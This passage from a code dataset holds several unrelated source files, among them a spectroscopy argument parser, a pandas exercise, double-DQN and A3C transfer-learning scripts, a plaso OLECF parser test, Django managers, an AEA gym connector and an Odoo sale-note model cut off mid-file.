parser.add_argument('--debug',\n # action='store_true',\n # dest='debug_mode',\n # help='Run in debug mode')\n\n parser.add_argument('--file-list',\n action='store',\n type=str,\n dest='file_list',\n help='List of Observed spectra')\n\n parser.add_argument('--template-list',\n action='store',\n type=str,\n dest='template_list',\n help='List of Templates')\n\n parser.add_argument('--primary',\n action='store',\n default='A',\n type=str,\n dest='primary_output_file',\n help='Output name for primary component spectrum')\n\n parser.add_argument('--secondary',\n action='store',\n default='B',\n type=str,\n dest='secondary_output_file',\n help='Output name for secondary component spectrum')\n\n parser.add_argument('--vo',\n action='store',\n default=25,\n type=float,\n dest='vo',\n help='vgamma')\n\n parser.add_argument('--min-mass-ratio',\n action='store',\n default=0.02,\n type=float,\n dest='min_mass_ratio',\n help='Minimum mass ratio')\n\n parser.add_argument('--max-mass-ratio',\n action='store',\n default=0.5,\n type=float,\n dest='max_mass_ratio',\n help='Maximum mass ratio')\n\n parser.add_argument('--mass-ratio-step',\n action='store',\n default=0.01,\n type=float,\n dest='mass_ratio_step',\n help='Mass ratio step')\n\n parser.add_argument('--sam',\n action='store',\n default='*',\n type=str,\n dest='sam',\n help='Spectral regions')\n\n args = parser.parse_args(args=arguments)\n\n return args\n\n\nif __name__ == '__main__':\n find2c = FindSecondComponent()\n find2c()\n\n","sub_path":"find2c/find2c.py","file_name":"find2c.py","file_ext":"py","file_size_in_byte":3694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"301278259","text":"##\n## Construya una tabla que contenga _c1 y una lista\n## separada por ':' de los valores de la columna _c2\n## para el archivo tbl0.tsv\n## \nimport pandas as pd\ndata=pd.read_csv('tbl0.tsv',delimiter='\\t', encoding='utf-8')\nc1=data['_c1']\nc2=data['_c2']\ndict_data={}\n\nfor i,j in zip(c1,c2):\n if i in dict_data:\n dict_data[i].append(j)\n else:\n dict_data[i]=[j]\n \nlabel=sorted(dict_data)\n\narreglo=[]\nfor i in label:\n var=sorted(dict_data[i])\n value=str(var[0])\n for j in range(1,len(var)):\n value+=':%s'%str(var[j])\n arreglo.append(value)\n\nresult=[]\n\nfor i,j in zip (label,arreglo):\n result.append([i,j])\n\ndf=pd.DataFrame(result, columns = ['_c0', 'lista'])\n\nprint(df)\n \n","sub_path":"q09.py","file_name":"q09.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"211598307","text":"import numpy as np\nimport tensorflow as tf\nimport pandas as pd\n\nfrom neural_net import DoubleQNetwork\nfrom buffer import experience_buffer\n#import tf.layers.{dense, conv2d\nimport os\n\n\ndef processState(states, img_shape):\n return np.reshape(states, [img_shape[0] * img_shape[1] * img_shape[2]])\n\ndef update_target_graph(tfVars, tau):\n total_vars = len(tfVars)\n op_holder = []\n for idx, var in enumerate(tfVars[0: total_vars // 2]):\n op_holder.append(tfVars[idx + total_vars // 2].assign(\\\n (var.value()*tau) + ((1-tau)*tfVars[idx+total_vars//2].value())))\n return op_holder\n\ndef update_target(op_holder, sess):\n for op in op_holder:\n sess.run(op)\n\n\ndef train_double_dqn(env, img_shape, batch_size=32, update_freq=4, y=0.99,\n startE=0.7, endE=0.95, annealing_steps=1000,\n num_episodes=10000, max_ep_length=50,\n pre_train_steps=10, checkpoint=50,\n load_model=False, save_path='models/ddqn/',\n lr=0.0001, h_size=64, out_size=64, render=False,\n verbosity=20, tau=0.001):\n tf.reset_default_graph()\n # img_shape = 250, 160, 3\n mainQN = DoubleQNetwork(env, 'main', img_shape, h_size, out_size, lr)\n targetQN = DoubleQNetwork(env, 'target', img_shape, h_size, out_size, lr)\n\n init = tf.global_variables_initializer()\n saver = tf.train.Saver()\n\n trainables = tf.trainable_variables()\n target_ops = update_target_graph(trainables, tau)\n my_buffer = experience_buffer()\n\n e = startE\n step_drop = (endE - startE) / annealing_steps\n\n jList, rList, total_steps = [], [], 0\n\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n\n with tf.Session() as sess:\n sess.run(init)\n if load_model:\n print('Loading model...')\n ckpt = tf.train.get_checkpoint_state(save_path)\n saver.restore(sess, ckpt.model_checkpoint_path)\n\n # pretraining steps: random actions\n print('Performing random pretraining steps...')\n for i in range(pre_train_steps):\n episode_buffer = experience_buffer()\n s = env.reset()\n # s = s.reshape((-1, img_shape[0], img_shape[1], img_shape[2]))\n j = 0\n while j < max_ep_length:\n j+=1\n a = np.random.randint(0, env.action_space.n)\n\n s, _, _, _ = env.step(a)\n s1, r, d, info = env.step(a)\n # s1 = s1.reshape((-1, img_shape[0], img_shape[1], img_shape[2]))\n episode_buffer.add(np.reshape(np.array([s, a, r, s1, d]), [1, 5]))\n s = s1\n\n if d:\n break\n\n my_buffer.add(episode_buffer.buffer )\n print('Random steps done\\n Begin training...')\n\n for i in range(num_episodes):\n if e < endE:\n e += step_drop\n\n episode_buffer = experience_buffer()\n s = env.reset()\n # s = s.reshape((-1, img_shape[0], img_shape[1], img_shape[2]))\n rAll, j = 0, 0\n while j < max_ep_length:\n j +=1\n\n if np.random.rand(1)[0] > e:\n a = np.random.randint(0, env.action_space.n)\n else:\n s0 = s.reshape((-1, img_shape[0], img_shape[1], img_shape[2]))\n a = sess.run(mainQN.predict, feed_dict={mainQN.X: s0})[0]\n\n s1, r, d, info = env.step(a)\n total_steps +=1\n episode_buffer.add(np.reshape(np.array([s, a, r, s1, d]), [1, 5]))\n s = s1#.reshape((-1, img_shape[0], img_shape[1], img_shape[2]))\n\n if render:\n env.render()\n\n if total_steps % (update_freq) == 0:\n train_batch = my_buffer.sample(batch_size)\n\n states = np.vstack(train_batch[:, 3]).reshape(\n (batch_size, img_shape[0],\n img_shape[1], img_shape[2]))\n Q1 = sess.run(mainQN.predict,\n feed_dict={mainQN.X: states})\n Q2 = sess.run(targetQN.Qout, #targetQN\n feed_dict={targetQN.X: states})\n end_multiplier = -(train_batch[:, 4] - 1)\n doubleQ = Q2[:batch_size, Q1]\n targetQ = train_batch[:, 2] + (\n y * doubleQ.dot(end_multiplier))\n\n old_states = np.vstack(train_batch[:, 0]).reshape(\n (batch_size, img_shape[0],\n img_shape[1], img_shape[2]))\n _, loss = sess.run([mainQN.update_model, mainQN.loss],\n feed_dict= \\\n {mainQN.X: old_states,\n mainQN.targetQ: targetQ,\n mainQN.actions: train_batch[:, 1]})\n if total_steps % (verbosity*5) == 0:\n print('Total step {} loss={:.3}'.format(total_steps, loss))\n # print('Step {} on iter {}: need to update the main model '\n # 'with loss={:.3f}'.format(j, i, loss))\n\n # update_target(target_ops, sess)\n rAll+=r\n if d:\n print('Arriving on terminal state in iteration {}'.format(i))\n break\n\n print('Episode terminated in {} steps --- curent e:{}'.format(j, e))\n my_buffer.add(episode_buffer.buffer)\n jList.append(j)\n rList.append(rAll)\n print('Reward of iteration {}: {:.3f}\\n'.format(i, rAll))\n if i % verbosity == 0:\n print('On iteration {} mean return={:.3f} ---- total '\n 'steps:{}'.format(i, sum(rList)/(i+1), total_steps))\n if (i+1)%checkpoint == 0:\n path = saver.save(sess, save_path)\n print('Model saved in path: {}'.format(path))\n df = pd.DataFrame([jList, rList], index=['j', 'reward']).T\n df.to_csv('models/ddqn/rewards.csv', sep=';')\n return jList, rList, num_episodes\n\n\n\n\n\n\n\n\n","sub_path":"dueling_dqn.py","file_name":"dueling_dqn.py","file_ext":"py","file_size_in_byte":6315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"174447122","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"Tests for the OLE Compound File (OLECF) default plugin.\"\"\"\n\nfrom __future__ import unicode_literals\n\nimport unittest\n\nfrom plaso.lib import definitions\nfrom plaso.parsers.olecf_plugins import default\n\nfrom tests.parsers.olecf_plugins import test_lib\n\n\nclass TestDefaultPluginOLECF(test_lib.OLECFPluginTestCase):\n \"\"\"Tests for the OLECF default plugin.\"\"\"\n\n def testProcess(self):\n \"\"\"Tests the Process function.\"\"\"\n plugin = default.DefaultOLECFPlugin()\n storage_writer = self._ParseOLECFFileWithPlugin(['Document.doc'], plugin)\n\n self.assertEqual(storage_writer.number_of_warnings, 0)\n self.assertEqual(storage_writer.number_of_events, 5)\n\n events = list(storage_writer.GetEvents())\n\n # Check the Root Entry event.\n event = events[0]\n\n self.CheckTimestamp(event.timestamp, '2013-05-16 02:29:49.795000')\n self.assertEqual(\n event.timestamp_desc, definitions.TIME_DESCRIPTION_MODIFICATION)\n\n event_data = self._GetEventDataOfEvent(storage_writer, event)\n self.assertEqual(event_data.name, 'Root Entry')\n\n expected_string = (\n 'Name: Root Entry')\n\n self._TestGetMessageStrings(\n event_data, expected_string, expected_string)\n\n # Check one other entry.\n event = events[1]\n\n self.CheckTimestamp(event.timestamp, '2013-05-16 02:29:49.704000')\n\n event_data = self._GetEventDataOfEvent(storage_writer, event)\n\n expected_string = 'Name: MsoDataStore'\n self._TestGetMessageStrings(\n event_data, expected_string, expected_string)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/parsers/olecf_plugins/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"429723378","text":"import datetime\r\n\r\nfrom django.db import models\r\nfrom django.db.models import Q\r\nfrom django.core.cache import cache\r\n\r\n\r\nclass ShowManager(models.Manager):\r\n\r\n def shows_for_display(self, type_show=None):\r\n Q1 = Q(raiting_average=None)\r\n Q2 = Q(rus_fields=None)\r\n Q3 = Q(premired=None)\r\n Q4 = Q(image_medium_url=None)\r\n Q5 = Q(image_original_url=None)\r\n\r\n shows = self.exclude(Q2 | Q3).order_by('-premired').exclude(Q4 & Q5)\r\n if type_show == 'anime':\r\n shows = shows.filter(genres=14)\r\n elif type_show == 'shows':\r\n shows = shows.filter(type_show='Scripted')\r\n\r\n elif type_show == 'cartoons':\r\n shows = shows.filter(type_show='Animation').exclude(genres=14)\r\n rus_objects = cache.get('rus_objects')\r\n return shows.filter(rus_fields__in=cache.get('rus_objects'))\r\n\r\n def search_form(self, value):\r\n Q1 = Q(name__icontains=value)\r\n\r\n shows = self.filter(Q1)[:10]\r\n if not shows:\r\n return shows\r\n dict_shows = list()\r\n\r\n for data in shows:\r\n try:\r\n\r\n dict_shows.append([data.name, data.rus_fields.name, data.premired, data.image_original_url,\r\n data.get_absolute_url()])\r\n\r\n except ValueError:\r\n continue\r\n print(dict_shows)\r\n return dict_shows\r\n\r\n\r\nclass RusFeldsManager(models.Manager):\r\n\r\n def search_form(self, value):\r\n Q1 = Q(name__icontains=value)\r\n\r\n shows_rus = self.filter(Q1)[:10]\r\n if not shows_rus:\r\n return shows_rus\r\n dict_shows = list()\r\n\r\n for data in shows_rus:\r\n try:\r\n data.show\r\n dict_shows.append([data.name, data.show.name, data.show.premired, data.show.image_original_url,\r\n data.show.get_absolute_url()])\r\n except:\r\n continue\r\n print(dict_shows)\r\n return dict_shows\r\n\r\n def search_rus_names(self):\r\n return self.filter(name__regex='[а-яА-Я]')\r\n\r\n\r\nclass EpisodeManager(models.Manager):\r\n\r\n def filter_episodes(self):\r\n print('Hello')\r\n\r\n return self.filter(airdate__gt=datetime.datetime.now()).order_by('airdate')[:20]\r\n","sub_path":"show_app/models_manager.py","file_name":"models_manager.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"172557192","text":"from __future__ import print_function\n\nimport argparse\nimport os\n\nimport torch\nimport torch.nn as nn\nimport torch.multiprocessing as mp\n\nimport my_optim\nfrom envs import create_atari_env\nfrom model import ActorCritic\nfrom test import test\nfrom train import train\nfrom torch.nn.init import xavier_uniform_ as Xavier\n\n# Based on\n# https://github.com/pytorch/examples/tree/master/mnist_hogwild\n# Training settings\nparser = argparse.ArgumentParser(description='A3C')\nparser.add_argument('--lr', type=float, default=0.0001,\n help='learning rate (default: 0.0001)')\nparser.add_argument('--gamma', type=float, default=0.99,\n help='discount factor for rewards (default: 0.99)')\nparser.add_argument('--tau', type=float, default=1.00,\n help='parameter for GAE (default: 1.00)')\nparser.add_argument('--entropy-coef', type=float, default=0.01,\n help='entropy term coefficient (default: 0.01)')\nparser.add_argument('--value-loss-coef', type=float, default=0.5,\n help='value loss coefficient (default: 0.5)')\nparser.add_argument('--max-grad-norm', type=float, default=50,\n help='value loss coefficient (default: 50)')\nparser.add_argument('--seed', type=int, default=1,\n help='random seed (default: 1)')\nparser.add_argument('--num-processes', type=int, default=4,\n help='how many training processes to use (default: 4)')\nparser.add_argument('--num-steps', type=int, default=20,\n help='number of forward steps in A3C (default: 20)')\nparser.add_argument('--max-episode-length', type=int, default=1000000,\n help='maximum length of an episode (default: 1000000)')\nparser.add_argument('--env-name', default='PongDeterministic-v4',\n help='environment to train on (default: PongDeterministic-v4)')\nparser.add_argument('--no-shared', default=False,\n help='use an optimizer without shared momentum.')\nparser.add_argument('--tag', required=True,\n help='tag for current experiment')\nparser.add_argument('--transfer-env', required=True,\n help='env model to use for initializing the network')\nparser.add_argument('--transfer-tag', required=True,\n help='tag for transfer env model')\n\n\nif __name__ == '__main__':\n os.environ['OMP_NUM_THREADS'] = '1'\n os.environ['CUDA_VISIBLE_DEVICES'] = \"\"\n\n args = parser.parse_args()\n\n torch.manual_seed(args.seed)\n\n transfer_env = create_atari_env(args.transfer_env)\n transfer_env_model = ActorCritic(\n transfer_env.observation_space.shape[0], transfer_env.action_space\n )\n\n checkpoint = torch.load('./checkpoints/{}_{}.tar'.format(args.transfer_env, args.transfer_tag))\n\n try:\n transfer_env_model.load_state_dict(checkpoint['model'])\n except Exception:\n transfer_env_model.load_state_dict(checkpoint['shared_model'])\n\n transfer_env_model.train()\n\n env = create_atari_env(args.env_name)\n\n # shared_model = nn.Sequential(*list(transfer_env_model.children())[:-1])\n # shared_model.add_module('actor_linear', nn.Linear(256, env.action_space.n))\n\n shared_model = transfer_env_model\n shared_model.actor_linear = nn.Linear(256, env.action_space.n)\n shared_model.share_memory()\n\n tag = args.tag\n\n if tag == 'all_train':\n from configs.all_train import Config\n elif tag == 'train_conv4':\n from configs.train_conv4 import Config\n elif tag == 'reset_conv4_lstm_fc':\n from configs.reset_conv4_lstm_fc import Config\n elif tag == 'reset_lstm_fc':\n from configs.reset_lstm_fc import Config\n elif tag == 'reset_fc':\n from configs.reset_fc import Config\n else:\n raise 'Invalid config'\n \n config = Config()\n\n # Freeze layers based on config values\n for parameter in shared_model.conv1.parameters():\n print('Retraining Conv1')\n parameter.requires_grad = config.conv1_train\n \n for parameter in shared_model.conv2.parameters():\n print('Retraining Conv2')\n parameter.requires_grad = config.conv2_train\n \n for parameter in shared_model.conv3.parameters():\n print('Retraining Conv3')\n parameter.requires_grad = config.conv3_train\n \n for parameter in shared_model.conv4.parameters():\n print('Retraining Conv3')\n parameter.requires_grad = config.conv4_train\n \n for parameter in shared_model.lstm.parameters():\n print('Retraining LSTM')\n parameter.requires_grad = config.lstm_train\n \n for parameter in shared_model.critic_linear.parameters():\n print('Retraining Critic Linear') \n parameter.requires_grad = config.critic_linear_train\n \n for parameter in shared_model.actor_linear.parameters():\n print('Retraining Actor Linear')\n parameter.requires_grad = config.actor_linear_train\n\n\n if(config.conv1_reset==True):\n print('Resetting Conv1')\n Xavier(shared_model.conv1.weight)\n shared_model.conv1.bias.data.fill_(0.01)\n\n if(config.conv2_reset==True):\n print('Resetting Conv2')\n Xavier(shared_model.conv2.weight)\n shared_model.conv2.bias.data.fill_(0.01)\n\n if(config.conv3_reset==True):\n print('Resetting Conv3')\n Xavier(shared_model.conv3.weight)\n shared_model.conv3.bias.data.fill_(0.01)\n\n if(config.conv4_reset==True):\n print('Resetting Conv4') \n Xavier(shared_model.conv4.weight)\n shared_model.conv4.bias.data.fill_(0.01)\n\n if(config.lstm_reset==True):\n print('Resetting LSTM')\n #Xavier(shared_model.lstm.weight)\n #shared_model.lstm.bias.data.fill_(0.01)\n for name, param in shared_model.lstm.named_parameters():\n if 'bias' in name:\n nn.init.constant_(param, 0.0)\n elif 'weight' in name:\n nn.init.xavier_normal_(param)\n \n if(config.critic_linear_reset==True):\n print('Resetting Critic Linear')\n Xavier(shared_model.critic_linear.weight)\n shared_model.critic_linear.bias.data.fill_(0.01)\n\n if(config.actor_linear_reset==True):\n print('Resetting Actor Linear')\n Xavier(shared_model.actor_linear.weight)\n shared_model.actor_linear.bias.data.fill_(0.01)\n \n\n if args.no_shared:\n optimizer = None\n else:\n optimizer = my_optim.SharedAdam(filter(lambda p: p.requires_grad, shared_model.parameters()), lr=args.lr)\n optimizer.share_memory()\n\n processes = []\n\n counter = mp.Value('i', 0)\n lock = mp.Lock()\n\n p = mp.Process(target=test, args=(args.num_processes,\n args, shared_model, counter, optimizer))\n p.start()\n processes.append(p)\n\n for rank in range(0, args.num_processes):\n p = mp.Process(target=train, args=(\n rank, args, shared_model, counter, lock, optimizer))\n p.start()\n processes.append(p)\n for p in processes:\n p.join()\n","sub_path":"transfer_learning.py","file_name":"transfer_learning.py","file_ext":"py","file_size_in_byte":7025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"145872208","text":"# -*- coding: utf-8 -*-\n\n# ------------------------------------------------------------------------------\n#\n# Copyright 2018-2019 Fetch.AI Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# ------------------------------------------------------------------------------\n\n\"\"\"Gym connector and gym channel.\"\"\"\nimport asyncio\nimport logging\nimport sys\nimport threading\nfrom asyncio import CancelledError\nfrom typing import Dict, Optional, cast, TYPE_CHECKING\n\nimport gym\n\nfrom aea.configurations.base import ConnectionConfig\nfrom aea.connections.base import Connection\nfrom aea.helpers.base import locate\nfrom aea.mail.base import Envelope\n\nif TYPE_CHECKING or \"pytest\" in sys.modules:\n from packages.protocols.gym.message import GymMessage\n from packages.protocols.gym.serialization import GymSerializer\nelse:\n from gym_protocol.message import GymMessage\n from gym_protocol.serialization import GymSerializer\n\nlogger = logging.getLogger(__name__)\n\n\n\"\"\"default 'to' field for Gym envelopes.\"\"\"\nDEFAULT_GYM = \"gym\"\n\n\nclass GymChannel:\n \"\"\"A wrapper of the gym environment.\"\"\"\n\n def __init__(self, public_key: str, gym_env: gym.Env):\n \"\"\"Initialize a gym channel.\"\"\"\n self.public_key = public_key\n self.gym_env = gym_env\n self._lock = threading.Lock()\n\n self._queues = {} # type: Dict[str, asyncio.Queue]\n\n def connect(self) -> Optional[asyncio.Queue]:\n \"\"\"\n Connect a public key to the gym.\n\n :return: an asynchronous queue, that constitutes the communication channel.\n \"\"\"\n if self.public_key in self._queues:\n return None\n\n assert len(self._queues.keys()) == 0, \"Only one public key can register to a gym.\"\n q = asyncio.Queue() # type: asyncio.Queue\n self._queues[self.public_key] = q\n return q\n\n def send(self, envelope: Envelope) -> None:\n \"\"\"\n Process the envelopes to the gym.\n\n :return: None\n \"\"\"\n sender = envelope.sender\n logger.debug(\"Processing message from {}: {}\".format(sender, envelope))\n self._decode_envelope(envelope)\n\n def _decode_envelope(self, envelope: Envelope) -> None:\n \"\"\"\n Decode the envelope.\n\n :param envelope: the envelope\n :return: None\n \"\"\"\n if envelope.protocol_id == \"gym\":\n self.handle_gym_message(envelope)\n else:\n raise ValueError('This protocol is not valid for gym.')\n\n def handle_gym_message(self, envelope: Envelope) -> None:\n \"\"\"\n Forward a message to gym.\n\n :param envelope: the envelope\n :return: None\n \"\"\"\n gym_message = GymSerializer().decode(envelope.message)\n performative = gym_message.get(\"performative\")\n if GymMessage.Performative(performative) == GymMessage.Performative.ACT:\n action = gym_message.get(\"action\")\n step_id = gym_message.get(\"step_id\")\n observation, reward, done, info = self.gym_env.step(action) # type: ignore\n msg = GymMessage(performative=GymMessage.Performative.PERCEPT, observation=observation, reward=reward, done=done, info=info, step_id=step_id)\n msg_bytes = GymSerializer().encode(msg)\n envelope = Envelope(to=envelope.sender, sender=DEFAULT_GYM, protocol_id=GymMessage.protocol_id, message=msg_bytes)\n self._send(envelope)\n elif GymMessage.Performative(performative) == GymMessage.Performative.RESET:\n self.gym_env.reset() # type: ignore\n elif GymMessage.Performative(performative) == GymMessage.Performative.CLOSE:\n self.gym_env.close() # type: ignore\n\n def _send(self, envelope: Envelope) -> None:\n \"\"\"Send a message.\n\n :param envelope: the envelope\n :return: None\n \"\"\"\n destination = envelope.to\n self._queues[destination].put_nowait(envelope)\n\n def disconnect(self) -> None:\n \"\"\"\n Disconnect.\n\n :return: None\n \"\"\"\n with self._lock:\n self._queues.pop(self.public_key, None)\n\n\nclass GymConnection(Connection):\n \"\"\"Proxy to the functionality of the gym.\"\"\"\n\n restricted_to_protocols = {\"gym\"}\n\n def __init__(self, public_key: str, gym_env: gym.Env, connection_id: str = \"gym\", **kwargs):\n \"\"\"\n Initialize a connection to a local gym environment.\n\n :param public_key: the public key used in the protocols.\n :param gym_env: the gym environment.\n :param connection_id: the connection id.\n \"\"\"\n super().__init__(connection_id=connection_id, **kwargs)\n self.public_key = public_key\n self.channel = GymChannel(public_key, gym_env)\n\n self._connection = None # type: Optional[asyncio.Queue]\n\n async def connect(self) -> None:\n \"\"\"\n Connect to the gym.\n\n :return: None\n \"\"\"\n if not self.connection_status.is_connected:\n self.connection_status.is_connected = True\n self._connection = self.channel.connect()\n\n async def disconnect(self) -> None:\n \"\"\"\n Disconnect from the gym.\n\n :return: None\n \"\"\"\n if self.connection_status.is_connected:\n assert self._connection is not None\n self.connection_status.is_connected = False\n await self._connection.put(None)\n self.channel.disconnect()\n self._connection = None\n self.stop()\n\n async def send(self, envelope: Envelope) -> None:\n \"\"\"\n Send an envelope.\n\n :param envelope: the envelop\n :return: None\n \"\"\"\n if not self.connection_status.is_connected:\n raise ConnectionError(\"Connection not established yet. Please use 'connect()'.\")\n self.channel.send(envelope)\n\n async def receive(self, *args, **kwargs) -> Optional['Envelope']:\n \"\"\"Receive an envelope.\"\"\"\n if not self.connection_status.is_connected:\n raise ConnectionError(\"Connection not established yet. Please use 'connect()'.\")\n try:\n assert self._connection is not None\n envelope = await self._connection.get()\n if envelope is None:\n return None\n return envelope\n except CancelledError: # pragma: no cover\n return None\n\n def stop(self) -> None:\n \"\"\"\n Tear down the connection.\n\n :return: None\n \"\"\"\n self._connection = None\n\n @classmethod\n def from_config(cls, public_key: str, connection_configuration: ConnectionConfig) -> 'Connection':\n \"\"\"\n Get the Gym connection from the connection configuration.\n\n :param public_key: the public key of the agent.\n :param connection_configuration: the connection configuration object.\n :return: the connection object\n \"\"\"\n gym_env_package = cast(str, connection_configuration.config.get('env'))\n gym_env = locate(gym_env_package)\n return GymConnection(public_key, gym_env(),\n connection_id=connection_configuration.name,\n restricted_to_protocols=set(connection_configuration.restricted_to_protocols))\n","sub_path":"packages/connections/gym/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":7738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"444968420","text":"# -*- coding: utf-8 -*-\r\nfrom odoo import models, fields, api\r\nfrom odoo.tools.translate import _\r\nimport logging\r\n\r\nfrom odoo.addons import decimal_precision as dp\r\nfrom odoo import exceptions\r\n\r\n_logger = logging.getLogger(__name__)\r\n\r\nclass crm_sale_note(models.Model):\r\n _name = 'crm.sale.note'\r\n _inherit = 'mail.thread'\r\n _description = 'Sale Note'\r\n\r\n @api.model\r\n def _default_currency(self):\r\n current_user_id=self._context.get('uid')\r\n current_user=self.env['res.users'].browse([current_user_id])\r\n currency_uf=None\r\n currency_obj=self.env['res.currency']\r\n currency_uf=currency_obj.search([('name','=','UF')], limit=1)\r\n if currency_uf:\r\n return currency_uf\r\n else:\r\n return current_user.company_id.currency_id\r\n\r\n @api.depends('partner_id','sale_note_number','partner_id.partner_abbr')\r\n def _compute_reference(self):\r\n abbr=None\r\n for sale in self:\r\n if sale.sale_note_number and sale.partner_id:\r\n abbr=sale.partner_id.partner_abbr\r\n if abbr and \"ABR\" in sale.sale_note_number:\r\n sale.sale_note_reference=sale.sale_note_number.replace(\"ABR\",abbr)\r\n else:\r\n raise exceptions.Warning(_('Cliente %s no tiene Abreviatura. Ingrese abreviatura en Cliente') %(sale.partner_id.name,))\r\n else:\r\n sale.sale_note_reference=_(\"Ref. No Disponible\")\r\n\r\n\r\n name=fields.Char('Description', required=True)\r\n partner_id=fields.Many2one('res.partner',string='Partner',store=True, required=True)\r\n partner_rut=fields.Char(related='partner_id.vat', string='RUT Cliente') \r\n partner_name=fields.Char(related='partner_id.name')\r\n street = fields.Char(related='partner_id.street', store=True, readonly=True)\r\n street2 = fields.Char(related='partner_id.street2', store=True,readonly=True)\r\n city = fields.Char(related='partner_id.city', store=True,readonly=True)\r\n zip = fields.Char(related='partner_id.zip', store=True,readonly=True)\r\n address_state = fields.Char(related='partner_id.state_id.name', store=True,readonly=True)\r\n country = fields.Char(related='partner_id.country_id.name', store=True,readonly=True)\r\n\r\n #contact for the sale note\r\n\r\n contact_id=fields.Many2one('res.partner',string='Contact', domain=\"[('parent_id','=',partner_id),('is_company','=',False)]\",store=True)\r\n contact_function= fields.Char(related='contact_id.function', store=True,readonly=True)\r\n contact_name= fields.Char(related='contact_id.name', store=True,readonly=True)\r\n contact_email= fields.Char(related='contact_id.email', store=True,readonly=True)\r\n contact_phone= fields.Char(related='contact_id.phone', store=True,readonly=True)\r\n contact_mobile= fields.Char(related='contact_id.mobile', store=True,readonly=True)\r\n user_id=fields.Many2one('res.users',string='Vendedor',store=True)\r\n salesman_id=fields.Many2one('res.users',string='Vendedor',store=True)\r\n\r\n #oppportunity link crm.lead\r\n\r\n project_id=fields.Many2one('project.project',string='Project',store=True, required=False, ondelete='cascade')\r\n external_lead=fields.Char(string='Oportunidad externa')\r\n\r\n #sales fields\r\n project_currency_id = fields.Many2one('res.currency', string='Currency',required=False, default=_default_currency, track_visibility='always', ondelete='restrict')\r\n price=fields.Monetary('Price', currency_field='project_currency_id',required=True, help='Price of Project')\r\n cost=fields.Monetary('Cost', currency_field='project_currency_id',required=True, help='Cost of Project')\r\n margin=fields.Float('Margen',digits=(16,2), readonly=True, help='Margen of Project')\r\n total_hours=fields.Float('Horas Total',digits=(6,1), help='Total Horas Vendidas')\r\n\r\n #invoice lines\r\n # invoice_ids=fields.One2many('crm.sale.note.invoice','note_id','Sales Note Invoice Lines')\r\n # supplier_ids=fields.One2many('crm.sale.note.supplier','note_id','Sales Note Supplier Lines')\r\n # comission_ids=fields.One2many('crm.sale.note.comm','note_id','Sales Note Commission Lines')\r\n doc_count=fields.Integer(compute=\"_get_attached_docs\", string=\"Number of documents attached\")\r\n purchase_order_id=fields.Many2many('purchase.order', string='Orden de Compra')\r\n purchase_order=fields.Char(string='O/C')\r\n\r\n\r\n order_line_quotation = fields.One2many('sale.order.line', 'order_id_quotation', string='Order Lines')\r\n date_from = fields.Date(string=\"Fecha Inicio\")\r\n date_to = fields.Date(string=\"Fecha Fin\")\r\n\r\n #sale note reference...basically a copy of project reference\r\n sale_note_number= fields.Char('Numero Referencia')\r\n sale_note_reference= fields.Char('Referencia', compute=\"_compute_reference\", store=True)\r\n\r\n\r\n\r\n\r\n \"\"\"_sql_constraints = [\r\n ('sale_note_uniq',\r\n 'UNIQUE (name,lead_id)',\r\n _('Sales Note name must be unique for the Opportunity!'))]\"\"\"\r\n\r\n @api.multi\r\n def _get_attached_docs(self):\r\n res = {}\r\n attachment = self.env['ir.attachment']\r\n for note in self:\r\n note_attachments = attachment.search([('res_model', '=', 'crm.sale.note'), ('res_id', '=', note.id)])\r\n self.doc_count= len(note_attachments) or 0\r\n\r\n # @api.multi\r\n # @api.onchange('invoice_ids')\r\n # @api.depends('invoice_ids')\r\n # def compute_max_line_sequence(self):\r\n # #Allow to know the highest sequence\r\n # #entered in purchase order lines.\r\n # #Web add 10 to this value for the next sequence\r\n # #This value is given to the context of the o2m field\r\n # #in the view. So when we create new purchase order lines,\r\n # #the sequence is automatically max_sequence + 10\r\n\r\n\r\n # self.max_line_sequence = (\r\n # max(self.mapped('invoice_ids.sequence') or [0]) + 1)\r\n\r\n # @api.multi\r\n # @api.onchange('supplier_ids')\r\n # @api.depends('supplier_ids')\r\n # def compute_max_supplier_sequence(self):\r\n # #Allow to know the highest sequence\r\n # #entered in purchase order lines.\r\n # #Web add 10 to this value for the next sequence\r\n # #This value is given to the context of the o2m field\r\n # #in the view. So when we create new purchase order lines,\r\n # #the sequence is automatically max_sequence + 10\r\n\r\n # self.max_supplier_sequence = (\r\n # max(self.mapped('supplier_ids.sequence') or [0]) + 1)\r\n\r\n # max_line_sequence = fields.Integer(string='Max sequence in lines',compute='compute_max_line_sequence')\r\n # max_supplier_sequence = fields.Integer(string='Max sequence in Supplier',compute='compute_max_supplier_sequence')\r\n\r\n @api.multi\r\n def attachment_tree_view(self):\r\n domain = [('res_model', '=', 'crm.sale.note'), ('res_id', 'in', self.ids)]\r\n res_id = self.ids and self.ids[0] or False\r\n\r\n return {\r\n 'name': _('Attachments'),\r\n 'domain': domain,\r\n 'res_model': 'ir.attachment',\r\n 'type': 'ir.actions.act_window',\r\n 'view_id': False,\r\n 'view_mode': 'kanban,tree,form',\r\n 'view_type': 'form',\r\n 'limit': 80,\r\n 'target':'same',\r\n 'context': 